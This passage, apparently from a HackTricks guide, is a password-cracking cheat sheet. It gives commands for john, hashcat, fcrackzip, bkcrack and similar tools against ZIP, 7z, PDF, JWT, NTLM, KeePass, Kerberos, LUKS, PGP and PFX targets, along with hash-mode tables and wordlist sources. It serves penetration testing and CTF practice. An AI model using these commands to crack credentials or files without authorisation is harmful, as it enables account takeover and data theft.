* [https://www.cmd5.org/](https://www.cmd5.org) (Hashes)
|
|||
|
* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
|
|||
|
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
|
|||
|
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
|
|||
|
|
|||
|
Check this out before trying to brute force a Hash.
|
|||
|
|
|||
|
### ZIP
|
|||
|
|
|||
|
```bash
|
|||
|
#sudo apt-get install fcrackzip
|
|||
|
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
|
|||
|
```
|
|||
|
|
|||
|
```bash
|
|||
|
zip2john file.zip > zip.john
|
|||
|
john zip.john
|
|||
|
```
|
|||
|
|
|||
|
```bash
|
|||
|
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
|
|||
|
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
|
|||
|
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
|
|||
|
```
|
|||
|
|
|||
|
#### Known plaintext zip attack
|
|||
|
|
|||
|
You need to know the **plaintext** (or part of the plaintext) **of a file contained inside** the encrypted zip. You can check **filenames and size of files contained inside** an encrypted zip running: **`7z l encrypted.zip`**\
|
|||
|
Download [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)from the releases page.
|
|||
|
|
|||
|
```bash
|
|||
|
# You need to create a zip file containing only the file that is inside the encrypted zip
|
|||
|
zip plaintext.zip plaintext.file
|
|||
|
|
|||
|
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
|
|||
|
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
|
|||
|
# With that key you can create a new zip file with the content of encrypted.zip
|
|||
|
# but with a different pass that you set (so you can decrypt it)
|
|||
|
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
|
|||
|
unzip unlocked.zip #User new_pwd as password
|
|||
|
```
|
|||
|
|
|||
|
### 7z
|
|||
|
|
|||
|
```bash
|
|||
|
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
|
|||
|
```
|
|||
|
|
|||
|
```bash
|
|||
|
#Download and install requirements for 7z2john
|
|||
|
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
|
|||
|
apt-get install libcompress-raw-lzma-perl
|
|||
|
./7z2john.pl file.7z > 7zhash.john
|
|||
|
```
|
|||
|
|
|||
|
### PDF
|
|||
|
|
|||
|
```bash
|
|||
|
apt-get install pdfcrack
|
|||
|
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
|
|||
|
#pdf2john didn't work well, john didn't know which hash type was
|
|||
|
# To permanently decrypt the pdf
|
|||
|
sudo apt-get install qpdf
|
|||
|
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
|
|||
|
```
|
|||
|
|
|||
|
### PDF Owner Password
|
|||
|
|
|||
|
To crack a PDF Owner password check this: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
|
|||
|
|
|||
|
### JWT
|
|||
|
|
|||
|
```bash
|
|||
|
git clone https://github.com/Sjord/jwtcrack.git
|
|||
|
cd jwtcrack
|
|||
|
|
|||
|
#Bruteforce using crackjwt.py
|
|||
|
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
|||
|
|
|||
|
#Bruteforce using john
|
|||
|
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
|
|||
|
john jwt.john #It does not work with Kali-John
|
|||
|
```
|
|||
|
|
|||
|
### NTLM cracking
|
|||
|
|
|||
|
```bash
|
|||
|
Format:USUARIO:ID:HASH_LM:HASH_NT:::
|
|||
|
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
|
|||
|
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
|
|||
|
```
|
|||
|
|
|||
|
### Keepass
|
|||
|
|
|||
|
```bash
|
|||
|
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
|
|||
|
keepass2john file.kdbx > hash #The keepass is only using password
|
|||
|
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
|
|||
|
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
|
|||
|
john --wordlist=/usr/share/wordlists/rockyou.txt hash
|
|||
|
```
|
|||
|
|
|||
|
### Keberoasting
|
|||
|
|
|||
|
```bash
|
|||
|
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
|
|||
|
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
|
|||
|
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
|
|||
|
```
|
|||
|
|
|||
|
### Lucks image
|
|||
|
|
|||
|
#### Method 1
|
|||
|
|
|||
|
Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
|
|||
|
|
|||
|
```bash
|
|||
|
bruteforce-luks -f ./list.txt ./backup.img
|
|||
|
cryptsetup luksOpen backup.img mylucksopen
|
|||
|
ls /dev/mapper/ #You should find here the image mylucksopen
|
|||
|
mount /dev/mapper/mylucksopen /mnt
|
|||
|
```
|
|||
|
|
|||
|
#### Method 2
|
|||
|
|
|||
|
```bash
|
|||
|
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
|
|||
|
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
|
|||
|
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
|
|||
|
cryptsetup luksOpen backup.img mylucksopen
|
|||
|
ls /dev/mapper/ #You should find here the image mylucksopen
|
|||
|
mount /dev/mapper/mylucksopen /mnt
|
|||
|
```
|
|||
|
|
|||
|
Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
|||
|
|
|||
|
### Mysql
|
|||
|
|
|||
|
```bash
|
|||
|
#John hash format
|
|||
|
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
|
|||
|
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
|
|||
|
```
|
|||
|
|
|||
|
### PGP/GPG Private key
|
|||
|
|
|||
|
```bash
|
|||
|
gpg2john private_pgp.key #This will generate the hash and save it in a file
|
|||
|
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
|
|||
|
```
|
|||
|
|
|||
|
### Cisco
|
|||
|
|
|||
|
<figure><img src="../.gitbook/assets/image (663).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
### DPAPI Master Key
|
|||
|
|
|||
|
Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) and then john
|
|||
|
|
|||
|
### Open Office Pwd Protected Column
|
|||
|
|
|||
|
If you have an xlsx file with a column protected by a password you can unprotect it:
|
|||
|
|
|||
|
* **Upload it to google drive** and the password will be automatically removed
|
|||
|
* To **remove** it **manually**:
|
|||
|
|
|||
|
```bash
|
|||
|
unzip file.xlsx
|
|||
|
grep -R "sheetProtection" ./*
|
|||
|
# Find something like: <sheetProtection algorithmName="SHA-512"
|
|||
|
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
|
|||
|
# Remove that line and rezip the file
|
|||
|
zip -r file.xls .
|
|||
|
```
|
|||
|
|
|||
|
### PFX Certificates
|
|||
|
|
|||
|
```bash
|
|||
|
# From https://github.com/Ridter/p12tool
|
|||
|
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
|
|||
|
# From https://github.com/crackpkcs12/crackpkcs12
|
|||
|
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
|||
|
```
|
|||
|
|
|||
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
\
|
|||
|
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|||
|
Get Access Today:
|
|||
|
|
|||
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
|
|||
|
|
|||
|
## Tools
|
|||
|
|
|||
|
**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
|
|||
|
|
|||
|
### Hash-identifier
|
|||
|
|
|||
|
```bash
|
|||
|
hash-identifier
|
|||
|
> <HASH>
|
|||
|
```
|
|||
|
|
|||
|
### Wordlists
|
|||
|
|
|||
|
* **Rockyou**
|
|||
|
* [**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)
|
|||
|
* [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)
|
|||
|
* [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)
|
|||
|
|
|||
|
### **Wordlist Generation Tools**
|
|||
|
|
|||
|
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configurable base chars, keymap and routes.
|
|||
|
|
|||
|
```bash
|
|||
|
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
|
|||
|
```
|
|||
|
|
|||
|
### John mutation
|
|||
|
|
|||
|
Read _**/etc/john/john.conf**_ and configure it
|
|||
|
|
|||
|
```bash
|
|||
|
john --wordlist=words.txt --rules --stdout > w_mutated.txt
|
|||
|
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
|||
|
```
|
|||
|
|
|||
|
### Hashcat
|
|||
|
|
|||
|
#### Hashcat attacks
|
|||
|
|
|||
|
* **Wordlist attack** (`-a 0`) with rules
|
|||
|
|
|||
|
**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
|
|||
|
|
|||
|
```
|
|||
|
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
|
|||
|
```
|
|||
|
|
|||
|
* **Wordlist combinator** attack
|
|||
|
|
|||
|
It's possible to **combine 2 wordlists into 1** with hashcat.\
|
|||
|
If list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated.
|
|||
|
|
|||
|
```bash
|
|||
|
# This will combine 2 wordlists
|
|||
|
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
|
|||
|
|
|||
|
# Same attack as before but adding chars in the newly generated words
|
|||
|
# In the previous example this will generate:
|
|||
|
## hello-world!
|
|||
|
## hello-earth!
|
|||
|
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
|
|||
|
```
|
|||
|
|
|||
|
* **Mask attack** (`-a 3`)
|
|||
|
|
|||
|
```bash
|
|||
|
# Mask attack with simple mask
|
|||
|
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
|
|||
|
|
|||
|
hashcat --help #will show the charsets and are as follows
|
|||
|
? | Charset
|
|||
|
===+=========
|
|||
|
l | abcdefghijklmnopqrstuvwxyz
|
|||
|
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
|||
|
d | 0123456789
|
|||
|
h | 0123456789abcdef
|
|||
|
H | 0123456789ABCDEF
|
|||
|
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
|
|||
|
a | ?l?u?d?s
|
|||
|
b | 0x00 - 0xff
|
|||
|
|
|||
|
# Mask attack declaring custom charset
|
|||
|
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
|
|||
|
## -1 ?d?s defines a custom charset (digits and specials).
|
|||
|
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
|
|||
|
|
|||
|
# Mask attack with variable password length
|
|||
|
## Create a file called masks.hcmask with this content:
|
|||
|
?d?s,?u?l?l?l?l?1
|
|||
|
?d?s,?u?l?l?l?l?l?1
|
|||
|
?d?s,?u?l?l?l?l?l?l?1
|
|||
|
?d?s,?u?l?l?l?l?l?l?l?1
|
|||
|
?d?s,?u?l?l?l?l?l?l?l?l?1
|
|||
|
## Use it to crack the password
|
|||
|
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
|
|||
|
```
|
|||
|
|
|||
|
* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack
|
|||
|
|
|||
|
```bash
|
|||
|
# Mask numbers will be appended to each word in the wordlist
|
|||
|
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
|
|||
|
|
|||
|
# Mask numbers will be prepended to each word in the wordlist
|
|||
|
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
|||
|
```
|
|||
|
|
|||
|
#### Hashcat modes
|
|||
|
|
|||
|
```bash
|
|||
|
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
|||
|
```
|
|||
|
|
|||
|
Cracking Linux Hashes - /etc/shadow file
|
|||
|
|
|||
|
```
|
|||
|
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
|
|||
|
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
|
|||
|
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
|
|||
|
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
|
|||
|
```
|
|||
|
|
|||
|
Cracking Windows Hashes
|
|||
|
|
|||
|
```
|
|||
|
3000 | LM | Operating-Systems
|
|||
|
1000 | NTLM | Operating-Systems
|
|||
|
```
|
|||
|
|
|||
|
Cracking Common Application Hashes
|
|||
|
|
|||
|
```
|
|||
|
900 | MD4 | Raw Hash
|
|||
|
0 | MD5 | Raw Hash
|
|||
|
5100 | Half MD5 | Raw Hash
|
|||
|
100 | SHA1 | Raw Hash
|
|||
|
10800 | SHA-384 | Raw Hash
|
|||
|
1400 | SHA-256 | Raw Hash
|
|||
|
1700 | SHA-512 | Raw Hash
|
|||
|
```
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Support HackTricks</summary>
|
|||
|
|
|||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
\
|
|||
|
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|||
|
Get Access Today:
|
|||
|
|
|||
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
|